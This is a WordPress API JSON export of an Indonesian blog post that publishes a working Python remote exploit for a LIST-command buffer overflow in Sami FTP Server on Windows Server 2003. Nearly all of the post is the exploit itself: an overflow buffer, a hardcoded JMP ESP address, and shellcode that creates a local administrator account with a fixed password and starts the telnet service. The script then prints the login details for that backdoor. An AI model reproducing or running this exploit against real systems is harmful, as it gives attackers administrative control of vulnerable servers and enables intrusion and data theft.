{"id":302,"date":"2018-10-13T08:54:56","date_gmt":"2018-10-13T08:54:56","guid":{"rendered":"http:\/\/xcode.or.id\/blog\/?p=302"},"modified":"2018-10-18T05:03:29","modified_gmt":"2018-10-18T05:03:29","slug":"exploit-sami-ftp-server-untuk-windows-server","status":"publish","type":"post","link":"https:\/\/xcode.or.id\/blog\/index.php\/2018\/10\/13\/exploit-sami-ftp-server-untuk-windows-server\/","title":{"rendered":"Exploit remote Sami FTP Server untuk Windows Server"},"content":{"rendered":"

Berikut Exploit Sami FTP Server untuk Windows Server yang dibuat oleh Kurniawan<\/p>\n

#!\/usr\/bin\/python\r\nimport socket\r\nimport sys\r\n \r\nif len(sys.argv) != 3:\r\n    print \"===========================================================================\"\r\n    print \"Exploit remote untuk Sami FTP Server pada celah LIST di Windows Server 2003\"\r\n    print \"---------------------------------------------------------------------------\"\r\n    print \"Progammer Kurniawan. trainingxcode@gmail.com. xcode.or.id.\"\r\n    print \"Cara penggunaan : .\/exploitsamiftp.py <ip target> <port>\"\r\n    sys.exit(1)\r\n \r\nipaddress = sys.argv[1]\r\nport = int(sys.argv[2])\r\nbuf = \"\\x41\" * 217\r\neip = \"\\xFC\\x9A\\x48\\x77\" #JMP ESP, shell32.dll, Windows Server 2003\r\nnop = \"\\x90\" * 37\r\n#shellcode dibuat dengan bahasa pemrograman assembly oleh kurniawan. E-mail : trainingxcode@gmail.com. xcode.or.id\r\n#Akses telnet :\r\n#username : kurniawan\r\n#password : yogyafreexcode\r\nshellcode  = ( \"\\xeb\\x18\\x5b\\x31\\xc0\\x50\\x31\\xc0\\x53\\xbb\\xc1\\x99\\xe6\\x77\\xff\\xd3\\x31\\xc0\\x50\\xbb\\xe4\\xf1\\xe4\\x77\\xff\\xd3\\xe8\\xe3\\xff\\xff\\xff\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x20\\x2f\\x43\\x20\\x6e\\x65\\x74\\x20\\x75\\x73\\x65\\x72\\x20\\x6b\\x75\\x72\\x6e\\x69\\x61\\x77\\x61\\x6e\\x20\\x79\\x6f\\x67\\x79\\x61\\x66\\x72\\x65\\x65\\x78\\x63\\x6f\\x64\\x65\\x20\\x2f\\x61\\x64\\x64\\x20\\x26\\x20\\x6e\\x65\\x74\\x20\\x6c\\x6f\\x63\\x61\\x6c\\x67\\x72\\x6f\\x75\\x70\\x20\\x61\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72\\x61\\x74\\x6f\\x72\\x73\\x20\\x6b\\x75\\x72\\x6e\\x69\\x61\\x77\\x61\\x6e\\x20\\x2f\\x61\\x64\\x64\\x20\\x26\\x20\\x73\\x63\\x20\\x63\\x6f\\x6e\\x66\\x69\\x67\\x20\\x74\\x6c\\x6e\\x74\\x73\\x76\\x72\\x20\\x73\\x74\\x61\\x72\\x74\\x3d\\x20\\x61\\x75\\x74\\x6f\\x20\\x26\\x20\\x73\\x63\\x20\\x73\\x74\\x61\\x72\\x74\\x20\\x74\\x6c\\x6e\\x74\\x73\\x76\\x72\\x20\\x26\\x30\\x78\\x30\\x30\"\r\n)\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((str(ipaddress),(port)))\r\nprint s.recv(1024)\r\ns.send(\"USER anonymous\\r\\n\")\r\nprint s.recv(1024)\r\ns.send(\"PASS anonymous\\r\\n\")\r\nprint s.recv(1024)\r\ns.send(\"LIST \" + buf + eip + nop + shellcode + \"\\r\\n\")\r\n#reference bug : https:\/\/www.exploit-db.com\/exploits\/24875\r\nprint s.recv(1024)\r\ns.close()\r\nprint \"Eksploitasi telah dilakukan. Untuk mengakses server target, ketik : telnet (ip target server) lalu enter\"\r\nprint \"username : kurniawan\"\r\nprint \"password : yogyafreexcode\"\r\n<\/pre>\n
Exploit ini bisa diakses di https:\/\/github.com\/kurniawandata\/exploitsamiftplistforwinserver <\/a><\/p>\n
Oleh Kurniawan<\/p>\n
Founder X-code<\/p>\n","protected":false},"excerpt":{"rendered":"
Berikut Exploit Sami FTP Server untuk Windows Server yang dibuat oleh Kurniawan #!\/usr\/bin\/python import socket import sys if len(sys.argv) != 3: print “===========================================================================” print “Exploit remote untuk Sami FTP Server pada celah LIST di Windows Server 2003” print “—————————————————————————” print Read More …<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/302"}],"collection":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=302"}],"version-history":[{"count":5,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/302\/revisions"}],"predecessor-version":[{"id":376,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/302\/revisions\/376"}],"wp:attachment":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}